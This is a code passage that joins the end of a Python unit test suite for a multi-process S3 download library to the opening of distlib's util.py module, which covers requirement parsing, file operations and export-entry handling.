self.assertEqual(
factory.call_args[0][0], {'region_name': 'myregion'}
)
class TestProcessPoolTransferFuture(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
self.meta = ProcessPoolTransferMeta(
transfer_id=self.transfer_id, call_args=CallArgs()
)
self.future = ProcessPoolTransferFuture(
monitor=self.monitor, meta=self.meta
)
def test_meta(self):
self.assertEqual(self.future.meta, self.meta)
def test_done(self):
self.assertFalse(self.future.done())
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.future.done())
def test_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.future.result())
def test_result_with_exception(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.future.result()
def test_result_with_keyboard_interrupt(self):
mock_monitor = mock.Mock(TransferMonitor)
mock_monitor._connect = mock.Mock()
mock_monitor.poll_for_result.side_effect = KeyboardInterrupt()
future = ProcessPoolTransferFuture(
monitor=mock_monitor, meta=self.meta
)
with self.assertRaises(KeyboardInterrupt):
future.result()
self.assertTrue(mock_monitor._connect.called)
self.assertTrue(mock_monitor.notify_exception.called)
call_args = mock_monitor.notify_exception.call_args[0]
self.assertEqual(call_args[0], self.transfer_id)
self.assertIsInstance(call_args[1], CancelledError)
def test_cancel(self):
self.future.cancel()
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(CancelledError):
self.future.result()
class TestProcessPoolTransferMeta(unittest.TestCase):
def test_transfer_id(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.transfer_id, 1)
def test_call_args(self):
call_args = CallArgs()
meta = ProcessPoolTransferMeta(1, call_args)
self.assertEqual(meta.call_args, call_args)
def test_user_context(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.user_context, {})
meta.user_context['mykey'] = 'myvalue'
self.assertEqual(meta.user_context, {'mykey': 'myvalue'})
class TestClientFactory(unittest.TestCase):
def test_create_client(self):
client = ClientFactory().create_client()
self.assertIsInstance(client, BaseClient)
self.assertEqual(client.meta.service_model.service_name, 's3')
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_create_client_with_client_kwargs(self):
client = ClientFactory({'region_name': 'myregion'}).create_client()
self.assertEqual(client.meta.region_name, 'myregion')
def test_user_agent_with_config(self):
client = ClientFactory({'config': Config()}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent_extra(self):
config = Config(user_agent_extra='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent(self):
config = Config(user_agent='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
class TestTransferMonitor(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
def test_notify_new_transfer_creates_new_state(self):
monitor = TransferMonitor()
transfer_id = monitor.notify_new_transfer()
self.assertFalse(monitor.is_done(transfer_id))
self.assertIsNone(monitor.get_exception(transfer_id))
def test_notify_new_transfer_increments_transfer_id(self):
monitor = TransferMonitor()
self.assertEqual(monitor.notify_new_transfer(), 0)
self.assertEqual(monitor.notify_new_transfer(), 1)
def test_notify_get_exception(self):
exception = Exception()
self.monitor.notify_exception(self.transfer_id, exception)
self.assertEqual(
self.monitor.get_exception(self.transfer_id), exception
)
def test_get_no_exception(self):
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
def test_notify_jobs(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 0)
def test_notify_jobs_for_multiple_transfers(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
other_transfer_id = self.monitor.notify_new_transfer()
self.monitor.notify_expected_jobs_to_complete(other_transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(
self.monitor.notify_job_complete(other_transfer_id), 1
)
def test_done(self):
self.assertFalse(self.monitor.is_done(self.transfer_id))
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.monitor.is_done(self.transfer_id))
def test_poll_for_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.monitor.poll_for_result(self.transfer_id))
def test_poll_for_result_raises_error(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.monitor.poll_for_result(self.transfer_id)
def test_poll_for_result_waits_till_done(self):
event_order = []
def sleep_then_notify_done():
time.sleep(0.05)
event_order.append('notify_done')
self.monitor.notify_done(self.transfer_id)
t = threading.Thread(target=sleep_then_notify_done)
t.start()
self.monitor.poll_for_result(self.transfer_id)
event_order.append('done_polling')
self.assertEqual(event_order, ['notify_done', 'done_polling'])
def test_notify_cancel_all_in_progress(self):
monitor = TransferMonitor()
transfer_ids = []
for _ in range(10):
transfer_ids.append(monitor.notify_new_transfer())
monitor.notify_cancel_all_in_progress()
for transfer_id in transfer_ids:
self.assertIsInstance(
monitor.get_exception(transfer_id), CancelledError
)
# Cancelling a transfer does not mean it is done as there may
# be cleanup work left to do.
self.assertFalse(monitor.is_done(transfer_id))
def test_notify_cancel_does_not_affect_done_transfers(self):
self.monitor.notify_done(self.transfer_id)
self.monitor.notify_cancel_all_in_progress()
self.assertTrue(self.monitor.is_done(self.transfer_id))
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
class TestTransferState(unittest.TestCase):
def setUp(self):
self.state = TransferState()
def test_done(self):
self.assertFalse(self.state.done)
self.state.set_done()
self.assertTrue(self.state.done)
def test_waits_till_done_is_set(self):
event_order = []
def sleep_then_set_done():
time.sleep(0.05)
event_order.append('set_done')
self.state.set_done()
t = threading.Thread(target=sleep_then_set_done)
t.start()
self.state.wait_till_done()
event_order.append('done_waiting')
self.assertEqual(event_order, ['set_done', 'done_waiting'])
def test_exception(self):
exception = RuntimeError()
self.state.exception = exception
self.assertEqual(self.state.exception, exception)
def test_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.jobs_to_complete, 5)
def test_decrement_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.decrement_jobs_to_complete(), 4)
class TestGetObjectSubmitter(StubbedClientTest):
def setUp(self):
super().setUp()
self.transfer_config = ProcessTransferConfig()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = mock.Mock(OSUtils)
self.download_request_queue = queue.Queue()
self.worker_queue = queue.Queue()
self.submitter = GetObjectSubmitter(
transfer_config=self.transfer_config,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil,
download_request_queue=self.download_request_queue,
worker_queue=self.worker_queue,
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.filename = 'myfile'
self.temp_filename = 'myfile.temp'
self.osutil.get_temp_filename.return_value = self.temp_filename
self.extra_args = {}
self.expected_size = None
def add_download_file_request(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'filename': self.filename,
'extra_args': self.extra_args,
'expected_size': self.expected_size,
}
kwargs.update(override_kwargs)
self.download_request_queue.put(DownloadFileRequest(**kwargs))
def add_shutdown(self):
self.download_request_queue.put(SHUTDOWN_SIGNAL)
def assert_submitted_get_object_jobs(self, expected_jobs):
actual_jobs = []
while not self.worker_queue.empty():
actual_jobs.append(self.worker_queue.get())
self.assertEqual(actual_jobs, expected_jobs)
def test_run_for_non_ranged_download(self):
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
]
)
def test_run_for_ranged_download(self):
self.transfer_config.multipart_chunksize = 2
self.transfer_config.multipart_threshold = 4
self.add_download_file_request(expected_size=4)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 4)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'Range': 'bytes=0-1'},
filename=self.filename,
),
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=2,
extra_args={'Range': 'bytes=2-'},
filename=self.filename,
),
]
)
def test_run_when_expected_size_not_provided(self):
self.stubber.add_response(
'head_object',
{'ContentLength': 1},
expected_params={'Bucket': self.bucket, 'Key': self.key},
)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
]
)
def test_run_with_extra_args(self):
self.stubber.add_response(
'head_object',
{'ContentLength': 1},
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid',
},
)
self.add_download_file_request(
extra_args={'VersionId': 'versionid'}, expected_size=None
)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'VersionId': 'versionid'},
filename=self.filename,
)
]
)
def test_run_with_exception(self):
self.stubber.add_client_error('head_object', 'NoSuchKey', 404)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError
)
def test_run_with_error_in_allocating_temp_file(self):
self.osutil.allocate.side_effect = OSError()
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), OSError
)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_submitter_cannot_be_killed(self):
self.add_download_file_request(expected_size=None)
self.add_shutdown()
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.head_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.submitter.run()
except KeyboardInterrupt:
self.fail(
'The submitter should have not been killed by the '
'KeyboardInterrupt'
)
class TestGetObjectWorker(StubbedClientTest):
def setUp(self):
super().setUp()
self.files = FileCreator()
self.queue = queue.Queue()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = OSUtils()
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil,
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.remote_contents = b'my content'
self.temp_filename = self.files.create_file('tempfile', '')
self.extra_args = {}
self.offset = 0
self.final_filename = self.files.full_path('final_filename')
self.stream = BytesIO(self.remote_contents)
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000
)
def tearDown(self):
super().tearDown()
self.files.remove_all()
def add_get_object_job(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'temp_filename': self.temp_filename,
'extra_args': self.extra_args,
'offset': self.offset,
'filename': self.final_filename,
}
kwargs.update(override_kwargs)
self.queue.put(GetObjectJob(**kwargs))
def add_shutdown(self):
self.queue.put(SHUTDOWN_SIGNAL)
def add_stubbed_get_object_response(self, body=None, expected_params=None):
if body is None:
body = self.stream
get_object_response = {'Body': body}
if expected_params is None:
expected_params = {'Bucket': self.bucket, 'Key': self.key}
self.stubber.add_response(
'get_object', get_object_response, expected_params
)
def assert_contents(self, filename, contents):
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as f:
self.assertEqual(f.read(), contents)
def assert_does_not_exist(self, filename):
self.assertFalse(os.path.exists(filename))
def test_run_is_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_contents(self.final_filename, self.remote_contents)
def test_run_jobs_is_not_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
self.assert_does_not_exist(self.final_filename)
def test_run_with_extra_args(self):
self.add_get_object_job(extra_args={'VersionId': 'versionid'})
self.add_shutdown()
self.add_stubbed_get_object_response(
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid',
}
)
self.worker.run()
self.stubber.assert_no_pending_responses()
def test_run_with_offset(self):
offset = 1
self.add_get_object_job(offset=offset)
self.add_shutdown()
self.add_stubbed_get_object_response()
self.worker.run()
with open(self.temp_filename, 'rb') as f:
f.seek(offset)
self.assertEqual(f.read(), self.remote_contents)
def test_run_error_in_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.stubber.add_client_error('get_object', 'NoSuchKey', 404)
self.add_stubbed_get_object_response()
self.worker.run()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError
)
def test_run_does_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')
)
)
self.add_stubbed_get_object_response()
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
def test_run_can_exhaust_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
# 5 is the current setting for max number of GetObject attempts
for _ in range(5):
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')
)
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id),
RetriesExceededError,
)
def test_run_skips_get_object_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.worker.run()
# Note we did not add a stubbed response for get_object
self.stubber.assert_no_pending_responses()
def test_run_final_job_removes_file_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
def test_run_fails_to_rename_file(self):
exception = OSError()
osutil = RenameFailingOSUtils(exception)
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=osutil,
)
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
self.worker.run()
self.assertEqual(
self.transfer_monitor.get_exception(self.transfer_id), exception
)
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_worker_cannot_be_killed(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.get_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.worker.run()
except KeyboardInterrupt:
self.fail(
'The worker should have not been killed by the '
'KeyboardInterrupt'
)
|
util.py
|
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
import ssl
import subprocess
import sys
import tarfile
import tempfile
try:
import threading
except ImportError:
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, httplib, xmlrpclib, splittype,
HTTPHandler, HTTPSHandler as BaseHTTPSHandler,
BaseConfigurator, valid_ident, Container, configparser,
URLError, match_hostname, CertificateError, ZipFile)
logger = logging.getLogger(__name__)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')'
VERSPEC = IDENT + r'\*?'
RELOP = '([<>=!~]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '~='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' +
RELOP + r')\s*(' + VERSPEC + '))*')
DIRECT_REF = r'(from\s+(?P<diref>.*))'
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF +
r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + r'\s*)')
EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not d['diref']:
url = None
else:
# direct reference
cons = None
url = d['diref'].strip()
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '~=' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s, url=url)
return result
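# Illustrative sketch of parse_requirement() (result shape inferred from the
# code above, not an authoritative doctest):
#
#     r = parse_requirement('foo (>= 1.2, < 2.0)')
#     # r.name        -> 'foo'
#     # r.constraints -> [('>=', '1.2'), ('<', '2.0')]
#     # r.requirement -> 'foo (>= 1.2, < 2.0)'
#
#     r = parse_requirement('foo [bar, baz]')
#     # r.extras      -> ['bar', 'baz']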
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
in os.environ):
result = os.environ['__PYVENV_LAUNCHER__']
else:
result = sys.executable
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
data = json.load(stream)
result = data['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
cp = configparser.ConfigParser()
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
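# Illustrative sketch: on a POSIX system convert_path('a/b/c') returns the
# string unchanged, while on Windows it would return r'a\b\c'; a leading or
# trailing '/' raises ValueError on non-Unix-ish systems.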
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise DistlibException if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix':
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
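# Illustrative sketch of the 'name = prefix:suffix [flags]' form accepted by
# get_export_entry() (values inferred from ENTRY_RE above):
#
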